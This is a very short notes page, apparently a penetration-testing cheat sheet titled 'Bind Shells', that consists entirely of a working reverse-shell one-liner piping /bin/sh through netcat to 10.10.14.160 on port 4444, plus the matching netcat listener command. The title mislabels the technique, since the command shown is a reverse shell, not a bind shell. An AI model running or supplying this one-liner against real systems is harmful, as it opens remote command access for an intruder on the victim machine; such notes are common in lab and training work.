Bind Shells

April 27, 2024

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.160 4444 >/tmp/f


nc -lnvp 4444

Last updated